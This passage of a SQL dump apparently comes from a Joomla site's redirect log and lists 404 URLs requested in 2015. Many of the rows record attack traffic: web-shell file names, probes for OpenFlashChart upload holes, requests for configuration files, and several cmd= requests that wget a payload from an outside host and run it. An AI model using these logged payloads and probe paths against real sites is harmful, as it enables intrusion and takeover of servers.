08:13:42','0000-00-00 00:00:00',301),(7539,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php/tr/parks-home','','','',1,0,'2015-05-11 10:13:23','0000-00-00 00:00:00',301),(7540,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/index.php/welcome.html','','','',1,0,'2015-05-11 11:44:49','0000-00-00 00:00:00',301),(7541,'https://www.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/index.php/welcome.html','','','',3,0,'2015-05-11 15:15:20','0000-00-00 00:00:00',301),(7542,'https://www.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php/tr/parks-home','','','',2,0,'2015-05-12 04:47:07','0000-00-00 00:00:00',301),(7543,'https://www.nova-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php/welcome.html','','','',4,0,'2015-05-14 23:38:31','0000-00-00 00:00:00',301),(7544,'https://www.nova-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/index.php/welcome.html','','','',6,0,'2015-05-15 10:02:03','0000-00-00 00:00:00',301),(7545,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component//index.php?option=com_jdownloads&Itemid=0&view=upload','','','',1,0,'2015-05-15 21:04:29','0000-00-00 00:00:00',301),(7546,'https://www.nova-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php/tr/parks-home','','','',4,0,'2015-05-16 00:43:19','0000-00-00 00:00:00',301),(7547,'https://www.3s-technologies.com.tr/3s-technologies.com.tr/joomla/index.php/welcome.html','','','',5,0,'2015-05-16 07:47:10','0000-00-00 00:00:00',301),(7548,'https://www.3s-technologies.com.tr/3s-technologies.com.tr/joomla/index.php/en/using-joomla/extensions/components/content-component/index.php/welcome.html','','','',5,0,'2015-05-16 19:20:04','0000-00-00 00:00:00',301),(7549,'http://3s-technologies.com.tr/index.php/en/?option=com_fabrik&c=import&view=import&filetype=csv','','','',1,0,'2015-05-18 09:39:19','0000-00-00 00:00:00',301),(7550,'http://3s-technologies.com.tr/index.php/tr/wp-login.php','','','',1,0,'2015-05-18 22:03:29','0000-00-00 00:00:00',301),(7551,'http://3s-technologies.com.tr/index.php/tr/administrator/index.php','','','',8312,0,'2015-05-18 22:03:29','0000-00-00 00:00:00',301),(7552,'http://www.3s-technologies.com.tr/index.php/en/index.php/en/index.php/en/index.php/en/using-joomla/extensions/components/users-component/username-reminder','','http://www.3s-technologies.com.tr/','',1,0,'2015-05-18 22:25:32','0000-00-00 00:00:00',301),(7553,'http://www.3s-technologies.com.tr/index.php?id=155&Itemid=81&lang=tr&option=com_content&view=article','','','',2,0,'2015-05-19 05:25:08','0000-00-00 00:00:00',301),(7554,'http://www.3s-technologies.com.tr/index.php/en//sites/all/modules/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2015-05-19 14:49:54','0000-00-00 00:00:00',301),(7555,'http://www.3s-technologies.com.tr/index.php/en//sites/all/modules/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2015-05-19 14:49:55','0000-00-00 00:00:00',301),(7556,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=116:sogutucu-sprey-frz&catid=40:temizleme&Itemid=127&lang=tr','','','',3,0,'2015-05-24 05:47:07','0000-00-00 00:00:00',301),(7557,'http://3s-technologies.com.tr/index.php/en/products.smd-dÃ¼ÅŸÃ¼k-hÄ±zlÄ±','','','',5,0,'2015-05-24 07:35:46','0000-00-00 00:00:00',301),(7558,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/using-joomla/extensions/components/content-component/article-categories/images/sampledata/parks/banner_cradle.jpg','','','',1,0,'2015-05-25 14:46:24','0000-00-00 00:00:00',301),(7559,'http://www.3s-technologies.com.tr/index.php?option=com_community','','','',2,0,'2015-05-25 16:16:25','0000-00-00 00:00:00',301),(7560,'http://www.3s-technologies.com.tr/index.php/en//wp-content/plugins/revslider/temp/update_extract/revslider/up.php','','','',2,0,'2015-06-02 01:09:02','0000-00-00 00:00:00',301),(7561,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates/beez-2/home-page-beez-2/images/stories/food.php?rf','','','',1,0,'2015-06-03 15:01:19','0000-00-00 00:00:00',301),(7562,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=149:cs40&catid=58:dusuk-hizli-smd-dizgi&Itemid=150&lang=tr','','','',1,0,'2015-06-04 21:46:28','0000-00-00 00:00:00',301),(7563,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/produc','','','',2,0,'2015-06-05 03:01:31','0000-00-00 00:00:00',301),(7564,'http://www.3s-technologies.com.tr/index.php?id=115&Itemid=126&lang=tr&option=com_content&view=article','','','',2,0,'2015-06-10 03:10:49','0000-00-00 00:00:00',301),(7565,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/modules//app/etc/local.xml','','','',1,0,'2015-06-12 07:51:10','0000-00-00 00:00:00',301),(7566,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/plugins//app/etc/local.xml','','','',1,0,'2015-06-12 07:51:11','0000-00-00 00:00:00',301),(7567,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php/en/using-joomla/extensions/components/content-component/index.php/welcome.html','','','',2,0,'2015-06-14 01:49:59','0000-00-00 00:00:00',301),(7568,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/component/content/category/81-english-uk/english-content','','','',19,0,'2015-06-16 12:17:48','0000-00-00 00:00:00',301),(7569,'https://www.nova-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php/en/using-joomla/extensions/components/content-component/index.php/welcome.html','','','',4,0,'2015-06-19 14:57:08','0000-00-00 00:00:00',301),(7570,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php/en/products/tel-lehim//index.php?option=com_jdownloads&Itemid=0&view=upload','','','',1,0,'2015-06-23 04:37:59','0000-00-00 00:00:00',301),(7571,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/images/stories/byz.php?baca','','','',2,0,'2015-06-28 12:15:41','0000-00-00 00:00:00',301),(7572,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/images/stories/byz.php.png','','','',1,0,'2015-06-28 12:16:04','0000-00-00 00:00:00',301),(7573,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/images/stories/byz.php.png?baca','','','',1,0,'2015-06-28 12:16:04','0000-00-00 00:00:00',301),(7574,'http://www.3s-technologies.com.tr//index.php?jat3action=gzip&type=css&file=configuration.php','','','',1,0,'2015-06-29 14:46:28','0000-00-00 00:00:00',301),(7575,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/tmp/ramz.php?smtp','','','',1,0,'2015-06-29 18:05:30','0000-00-00 00:00:00',301),(7576,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/tmp/ramz.php?cmd=wget http://www.ttravian.arhip.net/e107_admin/includes/.../perl.jpg;perl perl.jpg;perl perl.jpg;perl perl.jpg;perl perl.jpg;perl perl.jpg;','','','',1,0,'2015-06-29 18:05:30','0000-00-00 00:00:00',301),(7577,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/tmp/ramz.php?cmd=wget http://www.ttravian.arhip.net/e107_admin/includes/.../yena.jpg;mv yena.jpg yena.php','','','',1,0,'2015-06-29 18:05:36','0000-00-00 00:00:00',301),(7578,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/tmp/ramz.php?cmd=wget http://www.ttravian.arhip.net/e107_admin/includes/.../yena.jpg;mv yena.jpg aku.php','','','',1,0,'2015-06-29 18:05:41','0000-00-00 00:00:00',301),(7579,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/tmp/yena.php','','','',2,0,'2015-06-29 18:05:42','0000-00-00 00:00:00',301),(7580,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/tmp/aku.php','','','',2,0,'2015-06-29 18:05:53','0000-00-00 00:00:00',301),(7581,'http://www.3s-technologies.com.tr/index.php/en/tmp/ramz.php?smtp','','','',1,0,'2015-06-29 18:07:31','0000-00-00 00:00:00',301),(7582,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/modules/navigation-modules&amp;sa=U&amp;ei=qM2SVdDhHMrHuATg3YL4Dw&amp;ved=0CKMBEBYwHzhk&amp;usg=AFQjCNEGKCa_Tt6pAPrUfb4BRDwZZRrGGg//images/stories/ViAr.php?rf','','','',1,0,'2015-06-30 17:31:31','0000-00-00 00:00:00',301),(7583,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/modules//images/stories/ViAr.php?rf','','','',1,0,'2015-06-30 17:31:31','0000-00-00 00:00:00',301),(7584,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/modules/navigation-modules&amp;sa=U&amp;ei=ts2SVcD1EtSLuASLvqyICg&amp;ved=0CKMBEBYwHzhk&amp;usg=AFQjCNGJ6R8OrDjxlemyraA-iTsM2blxSQ//images/stories/ViAr.php?rf','','','',1,0,'2015-06-30 17:31:34','0000-00-00 00:00:00',301),(7585,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/modules/navigation-modules&amp;sa=U&amp;ei=qM2SVdDhHMrHuATg3YL4Dw&amp;ved=0CKMBEBYwHzhk&amp;usg=AFQjCNEGKCa_Tt6pAPrUfb4BRDwZZRrGGg//images/stories/food/footer.php?clone','','','',1,0,'2015-06-30 17:31:35','0000-00-00 00:00:00',301),(7586,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/modules//images/stories/food/footer.php?clone','','','',1,0,'2015-06-30 17:31:35','0000-00-00 00:00:00',301),(7587,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/modules/navigation-modules&amp;sa=U&amp;ei=ts2SVcD1EtSLuASLvqyICg&amp;ved=0CKMBEBYwHzhk&amp;usg=AFQjCNGJ6R8OrDjxlemyraA-iTsM2blxSQ//images/stories/food/footer.php?clone','','','',1,0,'2015-06-30 17:31:35','0000-00-00 00:00:00',301),(7588,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/modules/navigation-modules&amp;sa=U&amp;ei=xc2SVemWOpCHuAS7ko7oDQ&amp;ved=0CKMBEBYwHzhk&amp;usg=AFQjCNGEZ4Sqpg-tfc_0rYZae5vScWXZPw//images/stories/ViAr.php?rf','','','',1,0,'2015-06-30 17:31:43','0000-00-00 00:00:00',301),(7589,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/modules/navigation-modules&amp;sa=U&amp;ei=xc2SVemWOpCHuAS7ko7oDQ&amp;ved=0CKMBEBYwHzhk&amp;usg=AFQjCNGEZ4Sqpg-tfc_0rYZae5vScWXZPw//images/stories/food/footer.php?clone','','','',1,0,'2015-06-30 17:31:44','0000-00-00 00:00:00',301),(7590,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/modules/navigation-modules&amp;sa=U&amp;ei=1c2SVaePLoaouwSRyaSADQ&amp;ved=0CKMBEBYwHzhk&amp;usg=AFQjCNEIIgW3pcyjvnitI7sW3qa1a2PbvQ//images/stories/ViAr.php?rf','','','',1,0,'2015-06-30 17:31:56','0000-00-00 00:00:00',301),(7591,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/modules/navigation-modules&amp;sa=U&amp;ei=1c2SVaePLoaouwSRyaSADQ&amp;ved=0CKMBEBYwHzhk&amp;usg=AFQjCNEIIgW3pcyjvnitI7sW3qa1a2PbvQ//images/stories/food/footer.php?clone','','','',1,0,'2015-06-30 17:31:58','0000-00-00 00:00:00',301),(7592,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/modules/navigation-modules&amp;sa=U&amp;ei=482SVeHOEIqwuAS4m4DIBQ&amp;ved=0CKMBEBYwHzhk&amp;usg=AFQjCNGwQzgg1T_NtSqm5wWwqdGUPqOH6Q//images/stories/ViAr.php?rf','','','',1,0,'2015-06-30 17:32:06','0000-00-00 00:00:00',301),(7593,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/modules/navigation-modules&amp;sa=U&amp;ei=482SVeHOEIqwuAS4m4DIBQ&amp;ved=0CKMBEBYwHzhk&amp;usg=AFQjCNGwQzgg1T_NtSqm5wWwqdGUPqOH6Q//images/stories/food/footer.php?clone','','','',1,0,'2015-06-30 17:32:08','0000-00-00 00:00:00',301),(7594,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/modules/navigation-modules&amp;sa=U&amp;ei=982SVZbXNY7IuASt8KiQDw&amp;ved=0CKMBEBYwHzhk&amp;usg=AFQjCNGMykdqE1lYes0hTbHFcdvX1D44rA//images/stories/ViAr.php?rf','','','',1,0,'2015-06-30 17:32:13','0000-00-00 00:00:00',301),(7595,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/modules/navigation-modules&amp;sa=U&amp;ei=982SVZbXNY7IuASt8KiQDw&amp;ved=0CKMBEBYwHzhk&amp;usg=AFQjCNGMykdqE1lYes0hTbHFcdvX1D44rA//images/stories/food/footer.php?clone','','','',1,0,'2015-06-30 17:32:14','0000-00-00 00:00:00',301),(7596,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component//sites/all/modules/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2015-07-03 07:25:53','0000-00-00 00:00:00',301),(7597,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component//sites/all/modules/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2015-07-03 07:25:54','0000-00-00 00:00:00',301),(7598,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=wawalo.php','','','',1,0,'2015-07-04 05:34:14','0000-00-00 00:00:00',301),(7599,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=wawalo.php.pHp','','','',1,0,'2015-07-04 05:34:15','0000-00-00 00:00:00',301),(7600,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=wawalo.php','','','',1,0,'2015-07-04 05:34:15','0000-00-00 00:00:00',301),(7601,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=wawalo.php.pHp','','','',1,0,'2015-07-04 05:34:16','0000-00-00 00:00:00',301),(7602,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=wawalo.php','','','',1,0,'2015-07-04 05:34:16','0000-00-00 00:00:00',301),(7603,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=wawalo.php.pHp','','','',1,0,'2015-07-04 05:34:17','0000-00-00 00:00:00',301),(7604,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=wawalo.php','','','',1,0,'2015-07-04 05:34:17','0000-00-00 00:00:00',301),(7605,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=wawalo.php.pHp','','','',1,0,'2015-07-04 05:34:18','0000-00-00 00:00:00',301),(7606,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=wawalo.php','','','',1,0,'2015-07-04 05:34:18','0000-00-00 00:00:00',301),(7607,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=wawalo.php.pHp','','','',1,0,'2015-07-04 05:34:19','0000-00-00 00:00:00',301),(7608,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=wawalo.php','','','',1,0,'2015-07-04 05:34:19','0000-00-00 00:00:00',301),(7609,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=wawalo.php.pHp','','','',1,0,'2015-07-04 05:34:20','0000-00-00 00:00:00',301),(7610,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=wawalo.php','','','',1,0,'2015-07-04 05:34:20','0000-00-00 00:00:00',301),(7611,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=wawalo.php.pHp','','','',1,0,'2015-07-04 05:34:20','0000-00-00 00:00:00',301),(7612,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=wawalo.php','','','',1,0,'2015-07-04 05:34:21','0000-00-00 00:00:00',301),(7613,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=wawalo.php.pHp','','','',1,0,'2015-07-04 05:34:21','0000-00-00 00:00:00',301),(7614,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=wawalo.php','','','',1,0,'2015-07-04 05:34:22','0000-00-00 00:00:00',301),(7615,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=wawalo.php.pHp','','','',1,0,'2015-07-04 05:34:22','0000-00-00 00:00:00',301),(7616,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=wawalo.php','','','',1,0,'2015-07-04 05:34:22','0000-00-00 00:00:00',301),(7617,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=wawalo.php.pHp','','','',1,0,'2015-07-04 05:34:23','0000-00-00 00:00:00',301),(7618,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=wawalo.php','','','',1,0,'2015-07-04 05:34:23','0000-00-00 00:00:00',301),(7619,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=wawalo.php.pHp','','','',1,0,'2015-07-04 05:34:24','0000-00-00 00:00:00',301),(7620,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=wawalo.php','','','',1,0,'2015-07-04 05:34:28','0000-00-00 00:00:00',301),(7621,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=wawalo.php.pHp','','','',1,0,'2015-07-04 05:34:29','0000-00-00 00:00:00',301),(7622,'https://www.3s-technologies.com.tr/3s-technologies.com.tr/joomla/index.php/tr/parks-home','','','',4,0,'2015-07-05 17:44:53','0000-00-00 00:00:00',301),(7623,'https://www.3s-technologies.com.tr/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/index.php/welcome.html','','','',3,0,'2015-07-05 21:25:10','0000-00-00 00:00:00',301),(7624,'http://www.3s-technologies.com.tr//index.php?option=com_adsmanager&task=upload&tmpl=component','','','',7,0,'2015-07-14 00:11:23','0000-00-00 00:00:00',301),(7625,'http://www.3s-technologies.com.tr/index.php?option=com_content/index.php?option=com_adsmanager&task=upload&tmpl=component','','','',1,0,'2015-07-14 00:11:36','0000-00-00 00:00:00',301),(7626,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/modules/content-modules/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2015-07-14 17:54:07','0000-00-00 00:00:00',301),(7627,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/modules/content-modules/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2015-07-14 17:54:09','0000-00-00 00:00:00',301),(7628,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/modules/content-modules/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2015-07-14 17:54:10','0000-00-00 00:00:00',301),(7629,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/modules/content-modules/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2015-07-14 17:54:12','0000-00-00 00:00:00',301),(7630,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/modules/content-modules/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2015-07-14 17:54:13','0000-00-00 00:00:00',301),(7631,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/modules/content-modules/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2015-07-14 17:54:14','0000-00-00 00:00:00',301),(7632,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/modules/content-modules/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2015-07-14 17:54:15','0000-00-00 00:00:00',301),(7633,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/modules/content-modules/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2015-07-14 17:54:22','0000-00-00 00:00:00',301),(7634,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/modules/content-modules/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2015-07-14 17:54:23','0000-00-00 00:00:00',301),(7635,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/modules/content-modules/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2015-07-14 17:54:24','0000-00-00 00:00:00',301),(7636,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/modules/content-modules/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2015-07-14 17:54:25','0000-00-00 00:00:00',301),(7637,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/modules/content-modules/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2015-07-14 17:54:26','0000-00-00 00:00:00',301),(7638,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/modules/content-modules/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2015-07-14 17:54:27','0000-00-00 00:00:00',301),(7639,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/modules/content-modules/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2015-07-14 17:54:29','0000-00-00 00:00:00',301),(7640,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/modules/content-modules/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2015-07-14 17:54:31','0000-00-00 00:00:00',301),(7641,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/modules/content-modules/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2015-07-14 17:54:32','0000-00-00 00:00:00',301),(7642,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/modules/content-modules/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2015-07-14 17:54:32','0000-00-00 00:00:00',301),(7643,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/modules/content-modules/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2015-07-14 17:54:33','0000-00-00 00:00:00',301),(7644,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/modules/content-modules/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2015-07-14 17:54:35','0000-00-00 00:00:00',301),(7645,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/modules/content-modules/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2015-07-14 17:54:38','0000-00-00 00:00:00',301),(7646,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/modules/content-modules/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2015-07-14 17:54:39','0000-00-00 00:00:00',301),(7647,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/modules/content-modules/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2015-07-14 17:54:40','0000-00-00 00:00:00',301),(7648,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/modules/content-modules/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2015-07-14 17:54:41','0000-00-00 00:00:00',301),(7649,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/modules/content-modules/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2015-07-14 17:54:42','0000-00-00 00:00:00',301),(7650,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php/en/component/content/article/81-english-uk/english-content/83-baslang-c-smd-hatlar/administrator/','','','',1,0,'2015-07-21 16:22:30','0000-00-00 00:00:00',301),(7651,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php/en/component/content/article/81-english-uk/english-content/83-baslang-c-smd-hatlar/admin.php','','','',1,0,'2015-07-21 16:22:30','0000-00-00 00:00:00',301),(7652,'http://led-bazaar.org/3s-technologies.com.tr/joomla//index.php?option=com_adsmanager&task=upload&tmpl=component','','','',2,0,'2015-07-23 11:04:21','0000-00-00 00:00:00',301),(7653,'http://proneo-led.com/3s-technologies.com.tr/joomla//index.php?option=com_adsmanager&task=upload&tmpl=component','','','',6,0,'2015-07-23 20:41:07','0000-00-00 00:00:00',301),(7654,'http://www.3s-technologies.com.tr/index.php?option=com_adsmanager&task=upload&tmpl=component','','','',66,0,'2015-07-25 01:31:25','0000-00-00 00:00:00',301),(7655,'http://www.3s-technologies.com.tr/index.php/en//app/etc/local.xml','','','',1,0,'2015-07-30 04:25:26','0000-00-00 00:00:00',301),(7656,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=158:14fsfd&catid=44:pota&Itemid=159&lang=tr','','','',9,0,'2015-07-30 09:32:09','0000-00-00 00:00:00',301),(7657,'http://www.3s-technologies.com.tr/index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=desc','','','',2,0,'2015-07-30 19:58:24','0000-00-00 00:00:00',301),(7658,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php/en/component/content/category/81-english-uk/english-content','','','',8,0,'2015-08-01 12:34:00','0000-00-00 00:00:00',301),(7659,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php/tr/component/content/category/80-turkish-tr/turkish-content','','','',8,0,'2015-08-02 23:03:54','0000-00-00 00:00:00',301),(7660,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=71&Itemid=79&lang=tr','','','',1,0,'2015-08-05 05:01:43','0000-00-00 00:00:00',301),(7661,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/users-com','','','',1,0,'2015-08-09 21:54:28','0000-00-00 00:00:00',301),(7662,'http://3s-technologies.com.tr/index.php/en/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php','','http://3s-technologies.com.tr/index.php/en/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php','',1,0,'2015-08-10 